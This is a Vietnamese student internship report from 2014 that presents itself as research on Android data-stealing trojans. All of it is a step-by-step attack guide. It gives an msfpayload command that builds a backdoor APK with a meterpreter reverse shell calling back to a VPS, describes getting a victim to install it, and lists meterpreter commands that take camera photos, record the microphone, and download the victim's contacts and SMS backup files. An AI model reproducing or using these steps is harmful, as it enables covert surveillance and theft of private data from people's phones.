1. BÁO CÁO THỰC TẬP
Nghiên cứu các Trojan, Malware cho phép đánh
cắp dữ liệu như danh sách contact, tin nhắn trên
điện thoại sử dụng Android và gửi ra ngoài
Sinh viên thực hiện :Nguyễn Hoàng Thạch
GVHD: Võ Đỗ Thắng
TP.HCM, ngày 3 tháng 8 năm 2014

2. Xâm nhập điện thoại android qua VPS trên internet
Các bước thực hiện
Bước 1:Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào
Android như trên mang Lan với địa chỉ IP là địa chỉ của VPS
Chúng ta vẫn sử dụng lệnh “Msfpayload android/meterpreter/reverse_tcp
lhost=14.0.21.132 lport=4444 R > /root/Desktop/nice.apk” ở đây địa chỉ VPS là
14.0.21.184
Bước 2:Khởi động Metasploit Console trên VPS
Bước 3: Chúng ta thực hiện các bước xâm nhập như đã đề cập ở phần trên, ở
đây chỉ khác là sử dụng chính IP của VPS

3. Bước 4: Sau khi máy nạn nhân tải về file apk đã được tạo ra, máy android đó
sẽ bị hack

4. Bước 5: Sử dụng lệnh Help để xem các lệnh được metasploit hỗ trợ

5. Để xem các lệnh ta gõ help
Để xem thông tin về máy, nhập lệnh SysInfo
Để xem các tác vụ đang chạy gõ ps
Để upload gõ lệnh upload
Xem ip gõ ipconfig
Xem danh sách thư mục, file gõ ls
• Sử dụng camera:
Để xem danh sách camera, nhập webcam_list
Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở
danh sách camera ở phần trước hay sau.

6. • Ghi âm
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
• Lấy file từ sd card
Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục
Ví dụ 1: Chúng ta đánh cắp thông tin danh bạ
Dùng lệnh cd /sdcard để vào thư mục
Để tải về máy, ta nhập lệnh
Download 00001.vcf
Và file này sẽ được tải về thư mục root của máy Kali

7. Ví dụ 2: Chúng ta đánh cắp tin nhắn
Dùng lệnh cd /sdcard/SMSBackupRestore để vào thư mục
Để tải về máy, ta nhập lệnh
Download sms-20140803221402.xml
Và file này sẽ được tải về thư mục root của máy Kali